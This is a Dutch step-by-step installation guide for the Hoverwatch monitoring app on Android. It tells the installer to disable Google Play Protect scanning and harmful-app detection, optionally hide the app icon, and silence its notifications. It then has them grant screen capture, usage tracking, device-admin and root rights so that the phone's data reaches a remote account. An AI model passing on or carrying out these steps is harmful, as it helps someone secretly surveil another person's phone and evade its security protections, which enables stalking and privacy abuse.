Hoe Hoverwatch voor Android te installeren

Video-instructie:

Tekstinstructie:

1. Bereid uw telefoon voor:

Om te voorkomen dat Android vragen stelt over de activiteit van het monitoringprogramma:

Open "Play Store" applicatie -> tik op Menu -> selecteer "Play Protect" -> tik op het icoontje Instellingen / Settings .
Schakel "Apparaat scannen op beveiligingsrisico's / Scan device for security threats" en "Schadelijke app-detectie verbeteren / Improve harmful app detections" uit.

2. Download de app

Open uw browser. Zet indien gewenst de "Geheime modus / Secret mode", aan. Type hoverwatch.com in. Voer uw e-mailadres en wachtwoord in (maak een Hoverwatch-account aan) en klik op "GRATIS AANMELDEN / SIGN UP FREE".

Selecteer Android en klik op de download link.

Tik op "Downloaden / Download".

Tik op "Bestand openen / Open file".

Als u de pagina "Apparaat toevoegen / Add Device" niet kunt vinden, klikt u op de knop "Menu" en vervolgens op "Apparaat toevoegen / Add Device".

3. Installeer de app

Tik op "Instellingen / Settings" en geef toestemming om de app te installeren.

Tik op "Terug / Back".Tik op Installeren / Install.

Als "Openen" knop niet actief is volg dan de instructies..

Selecteer de installatieoptie en tik op OK.

Afhankelijk van uw keuze kunt u ervoor kiezen om het Hoverwatch icoontje te verbergen.

Ga akkoord met de wettelijke voorwaarden / legal terms.

Voer uw Hoverwatch-account login en wachtwoord in. Tik op Activeren / Activate.

Sta alles van de app toe:

Tik op "JA / YES" en tik op "Toestaan / Allow" om alle machtigingen te activeren.

Batterijoptimalisatie uitschakelen:

Klik op "Ja / Yes". Klik op "Toestaan / Allow".

Activeer "Bovenaan verschijnen / Appear on top" toestemming:

Klik op "Ja / Yes", zet "Toestemming toestaan" aan. Klik op de "Terug / Back" knop.

Sta toe dat de app het scherm vastlegt:

Tik op "JA / YES".

Schakel het item "Niet meer tonen / Don`t show again" in. Tik op de knop "Nu starten / Start now".

Activeer "Gebruik tracking / Usage tracking":

Tik op "Ja / Yes", zoek en tik op "Sync Service", activeer "Tracking toestaan / Allow usage tracking".

002.jpg 003.jpg

Tik tweemaal op de "terug / back" knop en keer terug naar de Hoverwatch-app.

App meldingen uitschakelen / app notifications:

Klik op "Ja / Yes". Vink "Toon meldingen / Show notifications" af.

5.1.jpg 5.2.jpg

Klik tweemaal op de "terug / back" knop en ga terug naar de Hoverwatch app.

Activeer Apparaat beheer / Device admin:

Klik op "Ja / Yes" klik dan op de knop "Activeren / Activate"

4. Extra instellingen controleren

Als uw telefoon niet is geroot, bent u helemaal klaar.

Als uw telefoon is geroot, zal het programma u tijdens de installatie nog een paar vragen stellen.

Als je gevraagd wordt of er opnieuw opgestart moet worden, antwoord dan "Ja".

Bij "Verzoek om toestemming voor de root" moet u het vakje "Niet meer vragen" aanvinken en vervolgens op "Toestaan / Authorize" klikken.

Controleer of uw apparaat correct is geroot door een gratis Root Checker van de Google Play Store.

Het programma zal beginnen te werken nadat uw computer opnieuw is opgestart.

Over 5-6 minuten verschijnt er informatie van het apparaat in uw Hoverwatch-account.

show up